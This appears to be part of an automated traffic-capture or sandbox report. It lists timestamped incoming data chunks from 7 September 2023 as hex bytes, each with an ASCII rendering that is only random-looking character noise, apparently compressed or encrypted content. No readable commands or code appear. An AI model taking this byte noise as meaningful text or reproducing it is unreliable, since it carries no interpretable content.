                                                                                                                      2023-09-07 16:19:24 UTC1140INData Raw: 56 81 9b 10 d4 6d 83 fc 6e 4f 42 9e 72 66 92 3d 2a ba 32 57 6f 3e 65 26 23 63 1f 91 b4 23 d2 0f d8 6f a0 31 13 75 f2 13 9c ce 34 d2 7d cc 66 b5 d2 04 94 c3 bd d9 20 1b 3b ff f4 19 37 5a 55 f9 34 39 01 d7 b8 12 a5 5f dd 7c 30 21 c0 12 7e 84 1d 52 b3 e2 44 a0 1e 52 9e 22 89 13 77 07 77 29 86 5a 4e 74 34 24 fa 25 42 af 0d 07 08 25 f3 98 ab 95 e1 9e 26 6c ed 73 5f 7f 13 5e ee e2 de 69 e6 42 7f b0 05 26 d9 cb 44 e9 e8 82 44 7d fc b0 3e 07 5a e9 62 6d 33 94 c3 00 12 ae cd 17 63 6a f4 2d 94 0b 42 85 e1 a7 50 a0 28 28 8c ee 63 b5 9e c4 28 46 4f c8 01 c4 3e b8 1d 46 30 38 6f 13 ca 30 b4 67 f5 79 57 68 77 04 9b c6 da f5 98 0c eb 24 14 47 e4 66 fa 1f b6 1a 5a 5e 8d 48 08 3e 3a 8f 88 63 23 b7 51 f1 59 0e d4 d2 66 97 f1 75 04 8d 19 35 0d 7e 01 c7 c7 7b 75 f2 7a 97 f7
                                                                                                                      Data Ascii: VmnOBrf=*2Wo>e&#c#o1u4}f ;7ZU49_|0!~RDR"ww)ZNt4$%B%&ls_^iB&DD}>Zbm3cj-BP((c(FO>F08o0gyWhw$GfZ^H>:c#QYfu5~{uz
                                                                                                                      2023-09-07 16:19:24 UTC1148INData Raw: 3f a2 ea c8 f2 ed 59 3a ff ac 12 34 a8 eb f9 91 c3 88 1a 35 1e b5 80 c7 0e c6 22 7f ef be 3e cc d0 fd 6d f7 e1 c3 ea 8e e3 56 e1 2b 7c 65 91 d9 5b 40 87 c9 74 19 29 2b d9 78 fb b8 71 d2 79 94 ef 9c 0d 4f 6a 4b ac 08 0d 17 c6 f2 e0 19 ac b0 a2 87 1a 57 af 12 5b 7a 1e af 15 87 dd c7 65 d2 a8 04 60 d6 ee b1 2a 1b 27 c0 ab a5 d1 ab fe 7e 48 a7 a6 eb a7 5e 0d 83 f6 fc 04 ee a0 8c f5 a0 ae 69 ec 64 f8 6e 34 b9 3c 1e 6f 75 af 9a 9c 82 87 c2 e4 34 b9 47 5b 6e 2d 92 67 5a d9 72 eb 99 0f af e8 e6 29 ce 9c 50 bf 01 69 be f1 79 78 18 4b 65 dc cf e9 51 f4 d9 93 19 1a 86 be 7a aa 63 13 b1 7e 7a e2 dd 3b 36 53 51 b0 89 00 7f 6c 9a 7a 75 8f a6 11 1d b3 34 02 9d 1b 9f 6a df d7 74 e6 83 2b 8e 9e 39 1a 7b d7 5e 79 2b 60 dc 1a ea 91 b2 73 a9 2e 77 78 03 8c da 94 ec 55 23 d6
                                                                                                                      Data Ascii: ?Y:45">mV+|e[@t)+xqyOjKW[ze`*'~H^idn4<ou4G[n-gZr)PiyxKeQzc~z;6SQlzu4jt+9{^y+`s.wxU#
                                                                                                                      2023-09-07 16:19:24 UTC1156INData Raw: 8d f3 ee fd a0 46 4b 17 59 86 d0 bd a2 ec 09 70 d6 47 97 c7 2e 49 37 95 65 e6 fc 4d 2e 49 67 e7 57 9f c7 0e 2f 4b 79 0b 7f a8 7a bc 59 5e 22 97 9b d5 e3 9c 08 01 e3 30 2c bf 44 8d a4 28 33 4d c8 ad 52 c1 b8 56 2b b3 52 b0 f7 10 ff bf 3e 75 8c 83 34 7e 24 f5 ad e1 d4 a2 fe a7 6f 0b 2e a6 57 0b b6 26 d1 ab 4c f1 2b e9 d5 fb e4 73 05 c8 d3 f3 2d 67 50 f6 b3 15 9e ec 9c 7a d7 78 24 53 f4 e1 49 0d 20 99 f2 a9 b7 74 73 7e 27 13 45 55 9b 49 dc 13 f3 e0 aa dc ac af 4c 1b 31 c7 1e 3f 07 49 48 88 ee 1f 09 b4 a1 03 c2 f8 d0 a9 6f 4a 68 07 5b 3d 43 54 07 c3 61 6e 9e 21 6b d8 a7 ce 90 61 eb 38 45 92 20 e5 15 92 cf d8 55 a5 5c 43 6e 0c 00 af c9 23 1e 95 e8 51 b7 0f d3 6f 46 da 4b 19 65 63 0a 96 12 00 a2 74 86 c8 40 07 af 07 1b 89 b6 c3 ae ea 63 27 22 43 fd ea c6 71 3c
                                                                                                                      Data Ascii: FKYpG.I7eM.IgW/KyzY^"0,D(3MRV+R>u4~$o.W&L+s-gPzx$SI ts~'EUIL1?IHoJh[=CTan!ka8E U\Cn#QoFKect@c'"Cq<
                                                                                                                      2023-09-07 16:19:24 UTC1164INData Raw: 93 e9 c0 10 f6 69 91 2c 66 61 45 64 ba f7 37 99 c0 14 92 0d 5c dd 3f 13 34 7b ce 24 94 27 55 9b 97 7e a1 9d 69 5e 74 45 6d e9 99 e6 05 18 f1 55 f2 e2 50 d9 b9 dc 5a a8 6d 8e 03 90 82 8b d9 b3 2a c4 39 36 5f f4 06 64 77 33 5f 95 56 97 89 97 a1 92 e0 d5 6c 1f 7a 79 47 a7 13 b0 a3 81 a6 87 4c 28 e6 1d 40 e3 70 05 90 ae dd 4e f7 b9 4d 75 aa 43 2e 46 c9 7d 18 91 94 ff a0 8e 21 ae 21 f6 27 f1 d4 d9 be ab a2 ba 00 af 1b 62 e1 02 52 20 58 1c 32 f9 e2 ae 56 be 1c 35 42 a1 f1 aa 85 a9 68 2c 13 57 20 ac ae 3d 08 29 b4 8c c3 14 d5 c3 4f 70 84 76 1f a3 64 78 cc 55 24 d3 6b 64 68 22 5d 74 1f 06 08 91 9b 99 bb 85 15 9f 42 c3 40 1d b8 df 24 ee 38 9c 06 f5 e4 e3 19 4d 64 08 89 03 b7 0f d3 d7 45 16 51 61 47 d9 03 05 4c 7d 7f 2c 64 1f 17 2d 6b 15 c2 7a a2 21 e8 cf 31 fa 4f
                                                                                                                      Data Ascii: i,faEd7\?4{$'U~i^tEmUPZm*96_dw3_VlzyGL(@pNMuC.F}!!'bR X2V5Bh,W =)OpvdxU$kdh"]tB@$8MdEQaGL},d-kz!1O
                                                                                                                      2023-09-07 16:19:24 UTC1172INData Raw: fd d3 0a 46 da 46 9f 84 35 ac ff 59 b7 46 88 92 01 59 1a 0a 1f 35 91 99 fd cb 9f 3c ab b5 59 ce 6b 1a 05 3e c6 03 53 30 f0 93 73 9a 86 18 6a 8f fd 01 2f 57 cb b6 61 d3 e9 00 6f 87 4e d9 71 2c 06 6b 65 d5 58 5e f3 a6 3c a4 8e 4f 18 0d dd 47 9f ef 0c 9e c7 cb f3 38 17 d9 ec b1 43 c2 d7 a9 25 5b af 65 4c a2 86 44 d9 03 20 d1 9d c9 53 1a 45 b2 47 d2 fb 4a 1d 90 f6 ed 4c 03 6a d1 f3 d6 65 e9 4c 74 8e 8c dc 15 6d b7 a2 e7 ef 5a 2b 84 2d ef 40 89 e9 2d a8 bc 31 fa 4e 47 e4 9a e8 79 93 bd ea 29 fc 9c 63 ba b3 c8 14 49 8b 9e 37 db ab ca 31 c0 6f be 53 32 87 1f 06 14 d8 f0 f4 d7 19 dd 39 99 03 46 37 72 e9 d1 bd 26 d1 4e bf 04 15 bc f6 6c b7 86 f6 47 76 a0 75 16 f5 da 17 f8 78 e2 58 e6 c7 60 2c 51 fa df 58 00 f5 c3 c0 29 ff c5 55 bd c1 5f b1 7b 44 f6 93 ad 66 6e 01
                                                                                                                      Data Ascii: FF5YFY5<Yk>S0sj/WaoNq,keX^<OG8C%[eLD SEGJLjeLtmZ+-@-1NGy)cI71oS29F7r&NlGvuxX`,QX)U_{Dfn
                                                                                                                      2023-09-07 16:19:24 UTC1179INData Raw: 68 2b 57 93 dd 64 bb e6 6a b3 9c 90 b5 c7 3f 68 17 36 99 89 ee 54 2d aa d7 ca 1c 39 c5 5c ab 46 b5 4b f5 61 1b cc f1 17 61 c9 30 af 4d ab 3e 8d dd a9 2c a7 dd 0a 77 f2 a9 3f 89 6f 56 62 be 77 d7 9f 5b 27 44 70 45 3b 8e f2 a5 cf 60 3b da 45 3b 0e 42 a3 90 11 60 57 ca da cd 71 81 dd 36 c7 0b 68 98 c0 cf 7f 01 49 11 ae cd 7e 0f 7f 1d de 61 52 c1 2a 40 b4 01 1d e7 b2 65 44 2e 3f 5a 1f 53 4b a0 91 dd 14 f3 01 ce cb b0 61 9c b9 ad 5a 75 9b 08 fa 67 19 82 be dd 12 be 15 23 26 59 59 3a 71 74 8c 8d 44 5b 26 08 e0 eb 16 5a 04 2b e7 14 c9 1e b6 a7 5c 3d 39 bf a5 8c a8 28 92 2c 8e 45 5d ed a9 d4 9e d5 c4 84 6a b7 9c f0 68 8f bf df 2e 8c 5f ab 96 e8 64 2b dd 14 a7 c1 a9 6c 71 b5 a9 93 6d 40 f6 f7 b0 de 73 5a b0 9d 3f ff b9 81 eb 9e ac ff d8 d9 a7 b8 39 0e 78 7b bc 5b
                                                                                                                      Data Ascii: h+Wdj?h6T-9\FKaa0M>,w?oVbw['DpE;`;E;B`Wq6hI~aR*@eD.?ZSKaZug#&YY:qtD[&Z+\=9(,E]jh._d+lqm@sZ?9x{[
                                                                                                                      2023-09-07 16:19:24 UTC1187INData Raw: 31 a9 c0 8e 43 15 59 72 a0 d4 47 e8 78 a0 99 bf 63 6c 31 6a c0 52 e0 cb e2 5e d1 83 81 64 0b 6a 1c 5e df 40 94 05 4f d1 c5 4f 8a 74 e2 03 35 e5 d5 df 06 e8 19 a2 e7 3c 7a 1a 89 7a 41 22 f5 b7 a4 4e 7f 9e ff e6 21 71 db 9c ac 6f 36 3e d9 9f fa fb ca b6 31 a4 4a fc a0 9e 59 83 97 bc 4a 81 99 0e 44 43 11 85 34 5f 5e 1a 23 ee 68 b3 ef ee c9 e0 97 71 fb 2d 5a 48 9c 84 a8 32 c6 d8 b5 50 1d 00 ce 6e 67 3e ba 0a 65 ca 58 61 e4 90 7d ad 96 35 aa e1 fd 91 ba d0 00 99 af 9f 2c 5c 89 50 2c 91 63 a3 35 57 13 b2 46 f6 8d 85 98 86 34 e5 b3 18 6b 50 a2 16 c0 8e cf 37 07 47 2b 9f 77 ba a3 ae a6 6c 5a 6a 27 4d d2 48 d4 c5 47 2f 06 bf 7e 1c e8 e0 97 b2 e3 86 b3 82 92 b6 0d 05 30 50 23 c1 a3 52 e9 7a 66 d5 5d 78 0d 59 fc 61 7d 8b c5 f1 66 f1 51 f6 12 76 4e a9 b7 28 1f 77 3a
                                                                                                                      Data Ascii: 1CYrGxcl1jR^dj^@OOt5<zzA"N!qo6>1JYJDC4_^#hq-ZH2Png>eXa}5,\P,c5WF4kP7G+wlZj'MHG/~0P#Rzf]xYa}fQvN(w:
                                                                                                                      2023-09-07 16:19:24 UTC1195INData Raw: 20 4e 16 63 9c cc 0e e8 87 61 3e 3f 41 3e e4 5e c2 ad 23 74 a3 b2 68 82 14 1a 6e e4 69 cf d9 a3 c4 6e 7c 66 20 9b 6e e5 7b 84 c3 e8 7f b7 da 12 91 67 95 ae 1b 9f 49 f3 19 fa 9b e8 7a 26 06 93 dc f3 48 77 0d 58 7e 68 2d 7b 71 41 0a 11 67 19 98 08 52 4c 49 4e 91 5b 37 57 a5 4e 18 a2 2d 8b b1 7f d1 c5 59 06 6f a0 87 34 c9 95 fe e0 f0 08 48 dc ea 1f 30 8b 1d d0 1f be 8f 55 3b 2d 86 8c 52 f1 60 77 50 2a 92 89 cc f2 f1 6d 24 74 90 41 74 5f 17 2f ee 12 78 80 61 a6 e0 60 97 45 ea 06 38 5b 89 24 5e 91 d2 68 52 ab 07 93 9f 1b 38 14 1a eb b9 53 d9 49 4c 2e b5 e4 94 5a 4c 12 04 c5 28 3b 10 ea ad b9 4e c3 04 f9 c3 23 a8 05 50 d6 a1 95 9e e6 65 c5 78 83 6b cf 3d 91 22 e1 8d 5e 29 57 62 bd 1d 8b 37 0b 33 03 4d 23 fb a7 a3 ef 9c b2 0e 99 ef 4d 43 bc c4 0b 4d 7a e7 db b8
                                                                                                                      Data Ascii: Nca>?A>^#thnin|f n{gIz&HwX~h-{qAgRLIN[7WN-Yo4H0U;-R`wP*m$tAt_/xa`E8[$^hR8SIL.ZL(;N#Pexk="^)Wb73M#MCMz
                                                                                                                      2023-09-07 16:19:24 UTC1203INData Raw: 5c a0 ea ae a1 e9 6a b8 c3 98 fa c2 17 bf cf c7 9a 03 ba e3 3a 49 73 75 aa e1 18 1b b7 7a 2c aa d4 1f 63 65 36 c0 41 8f a1 b3 1d dc ed da 19 46 a3 2c 92 99 45 0d 27 d6 ab c6 d2 a9 2c 57 96 b5 a1 b8 7a 78 6a 60 1d 8c 88 d7 70 dd 5f dc 49 89 0f b2 b0 5d 2b e1 1e 40 8e e8 6e 08 00 5f 93 0b d1 cd 91 13 e1 1b 04 5a 8d 9e b4 3b f4 4c 09 eb 29 8b b5 ba e1 11 75 75 e4 a0 e9 d4 22 a5 ac 1d 16 55 27 d6 1a 68 4a 23 dc 6a 06 d1 4f a1 21 3e bf 91 07 a5 36 32 45 51 50 50 6b 6f c3 71 27 14 e3 15 bb 36 c3 86 87 7a 43 39 09 2f fb e1 de 00 39 b7 40 8b 59 b4 a7 ff 38 d8 58 e1 48 56 53 59 5f db 91 11 e9 b8 c5 a0 ee 8a 5f 6f 12 f6 46 f1 a2 20 38 4d 3f 1e 9c ae 16 5a f5 e3 6a a1 ad b5 5f b4 90 d4 e0 a3 85 c4 a0 56 ca ad 52 38 0d ed 92 42 0a a5 dc 86 1f 26 4a 39 fb 0a 23 43 84
                                                                                                                      Data Ascii: \j:Isuz,ce6AF,E',Wzxj`p_I]+@n_Z;L)uu"U'hJ#jO!>62EQPPkoq'6zC9/9@Y8XHVSY__oF 8M?Zj_VR8B&J9#C
                                                                                                                      2023-09-07 16:19:24 UTC1211INData Raw: 0f 5b 34 38 67 f7 f4 25 d3 4d 53 49 1a ab b1 be c5 cc be 3e fb 3a 6b 04 0c ed ec ba 04 72 64 95 ae 38 3f 4b 6c b9 75 b0 4e 51 f9 6c 9a dd c3 0e c0 d6 73 b5 05 c7 51 9b ff f2 53 38 ae 6f 17 b6 07 51 dc 0c f6 e0 0f f4 ff 81 f3 c9 29 cd ff b1 1f f7 7b 44 63 7e 5f fa a5 5e 31 7e e4 a2 19 ac d0 49 c6 4b f2 a3 cf a4 12 b1 5d c0 a6 65 28 17 9c 4f 5b d9 40 c0 2b 8f 89 d7 7e f0 7a 20 27 2a 5b 8e 7b dc fc bd 15 b8 19 38 73 a2 30 9c 4a 79 06 b4 28 91 04 05 9a b1 a6 67 7f 3d 7b 56 e9 9e 6b b5 e7 a1 78 7b ca bc 7e a6 33 5f 06 94 a6 5c 4c 14 52 b1 d0 a4 8f 5c 34 5b 2b d2 45 cb ea 9f 9e 91 53 9f 68 df 24 91 72 04 a4 fc 50 b9 98 68 67 4e d4 f2 be 6c f9 c8 72 c8 eb e1 b7 fd 1f 1a a8 ce 9e 89 37 5b d9 45 80 ed fc 3a 6c e9 06 5f 52 7b 7d 32 7f 13 00 ec f3 d1 f9 a3 ec 75 ce
                                                                                                                      Data Ascii: [48g%MSI>:krd8?KluNQlsQS8oQ){Dc~_^1~IK]e(O[@+~z '*[{8s0Jy(g={Vkx{~3_\LR\4[+ESh$rPhgNlr7[E:l_R{}2u
                                                                                                                      2023-09-07 16:19:24 UTC1219INData Raw: dd 81 b5 bf e8 21 c3 3c 3f 1b 90 87 3b 59 f1 68 56 92 cd 5c a3 60 21 8f 44 c2 17 d6 f5 60 b4 85 d9 c3 04 a6 8c 54 7e e9 ee 6c 29 49 ca 1b 3f af d8 ef 58 49 dc 0b 1c 3a 3a 24 72 59 6f 8a 6f 8c 5e 5f ee 09 bf f6 bc 69 e7 c2 d7 47 a4 23 3d 98 ca fa 4a 87 46 90 41 19 59 38 70 7b 3b 83 3c 9c 9b fb 7c a4 34 58 0f 45 2b bb 96 42 d2 85 c7 66 cf 52 87 4b bd af 4b 9f 79 15 fe 80 5d b9 4f c2 23 2e d4 07 66 c8 db 07 db f5 48 6a 68 3e 4a 35 b2 83 e1 1c a0 12 6f 7e ee ac 2e f3 53 8f 09 21 ce 83 28 53 07 c8 db da 5b 51 e2 dc 9e f0 23 6d 93 f8 b7 0b 20 21 5e 48 06 2a 1e 19 9a ce 3f 04 5a 0b af 31 59 8c 1f 9d 6e 38 6d 76 aa e5 56 b2 67 e8 b3 7b f8 4f a0 88 84 bc be 1d 7f 92 4a 4b ec ff ce dc 7d a8 15 5f dc a1 16 c7 d4 e2 4e b5 b4 1d 45 74 47 38 36 bb 00 52 63 a1 f7 62 83
                                                                                                                      Data Ascii: !<?;YhV\`!D`T~l)I?XI::$rYoo^_iG#=JFAY8p{;<|4XE+BfRKKy]O#.fHjh>J5o~.S!(S[Q#m !^H*?Z1Yn8mvVg{OJK}_NEtG86Rcb
                                                                                                                      2023-09-07 16:19:24 UTC1226INData Raw: 7d d8 33 b3 8d 06 7d 2f 86 bd 76 a4 30 4a 0d 18 dc ff 43 4e 02 f1 60 2d d6 59 78 8f 09 17 14 f7 16 c8 41 fd 86 ea 0a c6 7b 71 99 a7 3f 2f 76 e1 f4 62 da ec 3d 9a 86 32 35 37 ca 48 18 a5 ca b7 74 39 f9 ba 23 a7 d5 c0 5c d6 ca ff 7a 32 7a bc b4 68 5c 02 6c 0c 57 46 8f 97 a3 87 da 54 61 ba ab 89 41 e5 f9 41 3c 65 84 ee 8c 57 e7 12 a6 86 bf 57 b5 83 07 ba 31 80 5a 1e 09 c7 8d 57 ba 36 7a da 5c 2b 4e 9b 47 bf 41 a5 93 16 b7 c8 89 f7 85 1c d8 74 ab 17 f5 c7 bf 33 19 c2 aa 71 5e 7a e0 0a 61 44 1a b0 2b 63 0b c5 cf a6 1e 04 49 c8 5a 85 89 a8 cb 1f 50 bd 9a 2d 06 ba bf 27 2c 87 7a e4 3c e4 d1 38 25 82 3d 89 46 fc be 06 b7 30 0c 60 e3 ac 5d e7 47 c2 7c 0b 37 8f 08 8c 50 50 2e e5 e2 4a 7f 31 b5 81 61 0f 18 7c fe 5a 67 fd 08 92 b4 1d 22 7c cf f4 b3 c2 04 b4 17 be 53
                                                                                                                      Data Ascii: }3}/v0JCN`-YxA{q?/vb=257Ht9#\z2zh\lWFTaAA<eWW1ZW6z\+NGAt3q^zaD+cIZP-',z<8%=F0`]G|7PP.J1a|Zg"|S
                                                                                                                      2023-09-07 16:19:24 UTC1234INData Raw: ca ab 28 88 fb c5 b3 ff 06 b4 4f 7f 17 1b 9f c5 f6 45 f7 13 f1 4e 5f 9d 55 18 65 3f df a1 22 d2 91 82 18 61 fc fb dd 09 a9 8c 5a aa 60 5c aa 67 20 55 8d 73 b5 81 dd 33 0c d5 53 94 d2 d5 a4 5f 67 5c 64 1a 37 1e 7a f4 5c 78 d7 f0 70 be 29 94 ae 94 ac 0e 8c 71 f3 a4 06 8d c4 23 87 50 a8 e4 f8 e9 81 36 b5 a2 7c f5 ed da a5 33 04 85 92 95 d2 35 9e 26 b3 e2 5c ed e2 5f 7f da 46 00 4b 59 88 4c a6 fb 8e 2f f6 d2 2f e7 4a 15 e3 eb 55 39 8f b5 75 ae 40 77 25 2b df bc 24 10 d3 bb 3b 54 1c 9f 77 99 bf 62 fc 0e c7 8f df 6c e3 65 ed 1d 63 fc fa d9 97 06 6a 9e 75 3e 7a f9 34 dd 9d 8e 85 39 c6 2f 65 69 77 a7 46 7b 65 98 9c 27 e2 ba e4 b7 6e 3d af 11 b2 4a 64 1d 2d dc c2 71 9a 76 a9 2e f4 a5 70 fc 55 13 d9 8d 08 0e 7c 67 10 c6 75 1b 85 0a 28 66 5e f1 c0 45 b4 c8 28 56 94
                                                                                                                      Data Ascii: (OEN_Ue?"aZ`\g Us3S_g\d7z\xp)q#P6|35&\_FKYL//JU9u@w%+$;Twblecju>z49/eiwF{e'n=Jd-qv.pU|gu(f^E(V
                                                                                                                      2023-09-07 16:19:24 UTC1242INData Raw: cf 81 1c af b4 2f db 29 2d ea 47 7a 4a 6f 63 1f a2 9f df 27 ae 13 74 88 8f 2f 39 4a 2e 24 eb 85 61 8f 30 f6 e0 3d 06 7f 0f 7b ac 9d 3c 5a 67 51 02 67 34 c1 7d 94 40 b7 04 d2 9d 3f ff 7d d0 f7 6a 23 81 41 74 d7 31 9d 6a 3e 2c be e6 51 71 c5 6f 3f 8e 17 57 04 4f 46 c5 15 0d 09 e2 0a 2e 7a 2b 66 fb 8b ff f9 04 86 17 6a c9 0e 8c 4e 19 1b 44 69 7e 63 70 6a 40 4c 1b 87 8f 67 ad d0 64 4e c7 e2 6c 7a 7b 3d db 1d b6 d9 e8 95 82 3f 11 eb e5 a1 f8 f5 62 bb dc 7a 89 49 6e a2 13 45 83 fe d5 86 c7 cd cb c2 e7 3a b9 e2 07 1a 31 a0 39 d0 6f 8e ef 8e f0 47 f1 dd f1 f3 6f a3 dd c1 ff 87 ee 88 13 e6 0c 7f 89 da dc b5 85 de df 77 27 50 11 ed dd f1 ee ff 70 be 2e 33 44 01 de f9 bb 77 9c 57 e3 80 45 df 8b c0 71 3b 79 0e 99 8c bf 16 89 3f 68 ef 7f 3c 76 d0 fe e6 c5 1f 38 68 e3
                                                                                                                      Data Ascii: /)-GzJoc't/9J.$a0={<ZgQg4}@?}j#At1j>,Qqo?WOF.z+fjNDi~cpj@LgdNlz{=?bzInE:19oGow'Pp.3DwWEq;y?h<v8h
                                                                                                                      2023-09-07 16:19:24 UTC1250INData Raw: 8e d7 3a 4f 90 69 bf 67 ed f7 2a b1 71 e8 0b 52 2e 6b 16 b7 7b 01 68 7c 8b be 96 ce 2a ce 06 14 bb 20 0c 88 58 40 b3 a0 43 7e 5e 6b c1 62 85 e2 8e 41 38 72 19 e5 f5 4a 75 ef e8 be 38 6f cb 3a ad 42 c0 56 08 90 17 56 47 f5 d6 c4 cb 41 f0 52 5e b8 1b 0f bb ed 88 06 e0 e7 55 2b 60 8d 50 3c e8 2d 58 4e 77 b2 86 a6 89 42 a5 53 3d 52 f0 8c 05 a6 02 9a a2 ba a5 15 90 21 1f f4 0a ed cf 4d 61 44 c6 6d 77 79 a4 39 18 6a a6 50 9b 80 ea 44 79 c2 1f 70 ce 64 5f c9 b6 63 49 b0 7a 6c 6c 3b 42 0a 64 6f 47 34 07 1f 9f fa 27 28 93 d0 08 5c 6c e1 26 e1 61 c2 e0 f7 ba dc b0 08 2b 16 49 12 b6 05 9b 2d 65 19 ac da 22 94 8b ac 78 4c 8f c5 3a 7b 5d d2 04 2c 56 f9 8b c0 42 68 a1 73 cf 11 30 11 62 3d 01 95 d5 77 4f 07 de 77 38 46 9d e2 6a 0c 78 63 c2 6c 20 52 bb 4f 74 dd 61 9d aa
                                                                                                                      Data Ascii: :Oig*qR.k{h|* X@C~^kbA8rJu8o:BVVGAR^U+`P<-XNwBS=R!MaDmwy9jPDypd_cIzll;BdoG4'(\l&a+I-e"xL:{],VBhs0b=wOw8Fjxcl ROta
                                                                                                                      2023-09-07 16:19:24 UTC1258INData Raw: ef ce f4 4b 7d 03 3e 97 e0 d3 07 c2 16 c2 fb cf e0 f3 38 3c 0f 85 93 60 26 fc fd 1c fe de 04 9f a7 e1 53 00 1f 09 3e 73 e1 b3 0d 3e d3 e0 b3 13 e2 54 9d 16 f1 0c 19 f1 ff 8c fa 0f 13 7e 25 65 5c ee 9f b9 bb 40 4b 32 7c f5 b0 c6 07 f5 d4 fe f6 ea 6d 4b 89 85 f6 b1 3b 52 fb 66 f4 4b cb f8 7f ee 5f 7a 46 2a 7c f7 cf 18 b0 57 bf 0f 70 f9 50 35 2e 6a 4b 3f 62 7d d4 96 1e 38 e1 72 dd 92 1e 36 50 ee a2 ad 54 ec a3 09 26 c2 b5 ce 63 4b 9b d1 90 9e 47 8d 7f b9 63 92 86 ff 8b ba 80 9a 7d 30 a4 d1 8c 82 b1 94 a8 51 30 d0 f6 b3 c7 24 d8 d4 3f fe 7b a2 ed a5 11 eb a3 90 bf 25 56 df ac b5 48 75 cb 93 87 88 4a 79 a2 32 33 72 db 63 a8 ab 90 16 e1 a6 86 89 a4 45 51 f3 f7 9c 3d b0 22 97 ef 90 8b ac d3 d9 0e 4d 70 99 40 8f 84 e2 e9 91 45 3f 68 0f ca ca 1c 2c 84 ec 0b de de
                                                                                                                      Data Ascii: K}>8<`&S>s>T~%e\@K2|mK;RfK_zF*|WpP5.jK?b}8r6PT&cKGc}0Q0$?{%VHuJy23rcEQ="Mp@E?h,
                                                                                                                      2023-09-07 16:19:24 UTC1265INData Raw: f4 fb 72 fa 73 1e ae 86 82 78 72 14 d6 07 f4 56 6c 7e 9a 4d c1 32 c0 98 79 92 f3 73 22 3a 0d af ef cb c2 43 12 bc be 2c f3 9e 7b ee 31 cc 93 5c 9f ce 93 ca bb 80 3c 1d 47 84 46 d3 14 d8 97 61 d5 46 6a 63 fe 27 3a c8 26 e1 57 6e b5 ef 18 40 7a bf 93 fd f2 63 c6 65 57 54 9f 5d 18 be b9 fa ec cc f0 0d b2 a7 35 7a f6 b2 05 16 f6 66 67 9e ec f9 55 f4 6c c6 82 8c e8 f1 40 e7 40 d9 f3 06 be 58 a3 c7 ef 6c 38 66 31 37 d8 77 0c 2e 8d ed 8e 34 ea d7 66 3d 3d 62 43 92 77 24 bb 0a fa 95 87 9c c9 48 a2 42 d0 e1 68 cb 58 9a f1 f3 68 9f 1e 19 db 1d 36 49 d9 d1 b3 c6 f0 80 e8 d9 ac 70 46 f4 ac 29 f2 40 4c 09 4f 65 83 31 f0 4a 78 0f e7 45 cf 98 1e bb ba 7a d1 04 20 38 f2 e0 e7 82 21 92 4d fb 5d f4 8c f1 b1 2c 0a 0f 0f 05 42 b7 e8 e0 82 81 4d 96 09 06 25 93 62 eb 3e 06 f0
                                                                                                                      Data Ascii: rsxrVl~M2ys":C,{1\<GFaFjc':&Wn@zceWT]5zfgUl@@Xl8f17w.4f==bCw$HBhXh6IpF)@LOe1JxEz 8!M],BM%b>
                                                                                                                      2023-09-07 16:19:24 UTC1273INData Raw: 28 fc d0 37 6f fd f8 cb 51 0b 5e 96 11 f8 1e 14 79 60 33 d1 b7 48 0d fa 16 59 3f f1 72 cd de d4 97 10 76 52 da c2 fa 09 54 cc e2 11 b4 be 96 34 19 6d f3 9a 27 19 6d b6 a6 49 66 5b 11 45 2d fa 98 d1 c0 ce 5e 87 a5 b8 fd 7c ea 7b 98 8f 1c 95 cf c4 ea 60 65 3f 8b 0d 99 05 df d0 fc 39 f4 32 97 be 83 f4 fd 08 7d cf 3f 8b ea 62 98 74 24 aa 6e 50 72 07 cd 9d 31 77 92 c8 23 6f a9 8c 79 51 70 23 af 9e 79 56 b4 7f f4 9d 34 4d d7 61 07 69 92 be b9 59 87 91 62 ff 76 ec d0 f9 eb cc d1 6b 53 75 a5 b0 04 d2 c3 dd a8 db e8 b4 85 be 51 78 d4 2f bd 22 90 84 c6 af a2 97 1f fb e3 49 f2 e6 64 2d 3a 17 be 0b 6f c4 f2 f0 65 6f 6b e7 16 37 54 2f 31 5d 13 b9 4e 5e 8d a9 bd 41 23 da f7 13 7a b9 7d 3e 3f 1d 2e 0a bb ef ce 5c 46 08 e1 f1 cb ab f9 b9 84 b0 b1 b6 82 17 63 9e c7 72 d5
                                                                                                                      Data Ascii: (7oQ^y`3HY?rvRT4m'mIf[E-^|{`e?92}?bt$nPr1w#oyQp#yV4MaiYbvkSuQx/"Id-:oeok7T/1]N^A#z}>?.\Fcr
                                                                                                                      2023-09-07 16:19:24 UTC1281INData Raw: 95 00 9f fb 28 49 85 d2 cb 2c d2 f2 bb 7f 3e 7f 09 7e b7 fa 77 c4 ef fe d1 91 96 df 6d d2 f3 bb bb 0c 17 e7 77 ab 1c a8 84 dd c0 5c 36 89 dc 69 b2 92 45 92 8c de 35 a5 ed 41 f2 fe 19 9e d3 44 6e 30 0d d1 f8 8d 91 19 92 8c f7 c2 47 cf e4 2d 1a d0 1c c3 c7 3c 32 e0 28 54 26 bc 82 6f 8b 6f 5a 69 7f d5 52 e8 96 97 17 63 9e 60 59 de 70 cd b8 a6 14 2d 6f e2 45 94 6c d1 bb 8c ea 60 54 87 cf 23 cb 65 08 a7 fd 15 27 01 a3 86 08 67 9e 6c 75 19 f9 8f 9d 43 7e 4e 27 cf 2c ec 11 a9 a4 48 2f 7a f0 14 4e 63 b9 c9 5e 73 19 30 eb 65 e1 6b f0 39 76 83 19 8d 5a 28 1d ec 1d d8 1f be fc 18 cc a6 6c 33 5e 04 a4 56 f3 7a 10 06 27 46 a5 93 8f 5a 2f 1e 05 52 94 76 14 48 39 53 0f 29 a9 bd a9 e7 94 72 38 11 f4 0a 96 43 9e 33 17 98 34 39 d2 4a 44 f9 0b 1f d3 bc 13 0e 4b 63 07 22 43
                                                                                                                      Data Ascii: (I,>~wmw\6iE5ADn0G-<2(T&ooZiRc`Yp-oEl`T#e'gluC~N',H/zNc^s0ek9vZ(l3^Vz'FZ/RvH9S)r8C349JDKc"C
